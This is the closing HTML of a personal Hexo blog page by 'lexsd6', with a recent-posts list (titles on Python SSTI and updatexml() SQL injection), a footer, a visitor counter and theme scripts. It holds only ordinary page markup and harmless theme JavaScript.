href="/2020/03/27/python%20%E5%85%B3%E4%BA%8E%E6%B2%99%E7%9B%92%E9%80%83%E9%80%B8%E7%9A%84%E6%80%9D%E8%80%83/">关于python ssti的思考</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/11/13/%E5%85%B3%E4%BA%8Eupdatexml()%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5%E7%9A%84%E6%80%9D%E8%80%83/">关于updatexml()报错注入的思考</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/10/03/hello-world/">Hello World</a></li></ul>




    <script>
        
    </script>
</div>
      <footer id="footer">
    <div class="outer">
        <div id="footer-info">
            <div class="footer-left">
                <i class="fa fa-copyright"></i> 
                2019-2020 lexsd6
            </div>
            <div class="footer-right">
                <a href="http://hexo.io/" target="_blank" title="快速、简洁且高效的博客框架">Hexo</a>  Theme <a href="https://github.com/MOxFIVE/hexo-theme-yelee" target="_blank" title="简而不减 Hexo 双栏博客主题  v3.5">Yelee</a> by MOxFIVE <i class="fa fa-heart animated infinite pulse"></i>
            </div>
        </div>
        
            <div class="visit">
                
                    <span id="busuanzi_container_site_pv" style='display:none'>
                        <span id="site-visit" title="本站到访数"><i class="fa fa-user" aria-hidden="true"></i><span id="busuanzi_value_site_uv"></span>
                        </span>
                    </span>
                
                
                    <span>| </span>
                
                
                    <span id="busuanzi_container_page_pv" style='display:none'>
                        <span id="page-visit"  title="本页阅读量"><i class="fa fa-eye animated infinite pulse" aria-hidden="true"></i><span id="busuanzi_value_page_pv"></span>
                        </span>
                    </span>
                
            </div>
        
    </div>
</footer>
    </div>
    
<script data-main="/js/main.js" src="//cdn.bootcss.com/require.js/2.2.0/require.min.js"></script>

    <script>
        $(document).ready(function() {
            var iPad = window.navigator.userAgent.indexOf('iPad');
            if (iPad > -1 || $(".left-col").css("display") === "none") {
                var bgColorList = ["#9db3f4", "#414141", "#e5a859", "#f5dfc6", "#c084a0", "#847e72", "#cd8390", "#996731"];
                var bgColor = Math.ceil(Math.random() * (bgColorList.length - 1));
                $("body").css({"background-color": bgColorList[bgColor], "background-size": "cover"});
            }
            else {
                var backgroundnum = 5;
                var backgroundimg = "url(/background/bg-x.jpg)".replace(/x/gi, Math.ceil(Math.random() * backgroundnum));
                $("body").css({"background": backgroundimg, "background-attachment": "fixed", "background-size": "cover"});
            }
        })
    </script>





<div class="scroll" id="scroll">
    <a href="#" title="返回顶部"><i class="fa fa-arrow-up"></i></a>
    <a href="#comments" onclick="load$hide();" title="查看评论"><i class="fa fa-comments-o"></i></a>
    <a href="#footer" title="转到底部"><i class="fa fa-arrow-down"></i></a>
</div>
<script>
    // Open in New Window
    
        var oOpenInNew = {
            
            
            
            
            
            
             archives: ".archive-article-title", 
             miniArchives: "a.post-list-link", 
            
             friends: "#js-friends a", 
             socail: ".social a" 
        }
        for (var x in oOpenInNew) {
            $(oOpenInNew[x]).attr("target", "_blank");
        }
    
</script>

    <script>
        var originTitle = document.title;
        var titleTime;
        document.addEventListener("visibilitychange", function() {
            if (document.hidden) {
                document.title = "(つェ⊂) 我藏好了哦~ " + originTitle;
                clearTimeout(titleTime);
            }
            else {
                document.title = "(*´∇｀*) 被你发现啦~ " + originTitle;
                titleTime = setTimeout(function() {
                    document.title = originTitle;
                }, 2000);
            }
        })
    </script>

<script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js">
</script>
  </div>
</body>
</html>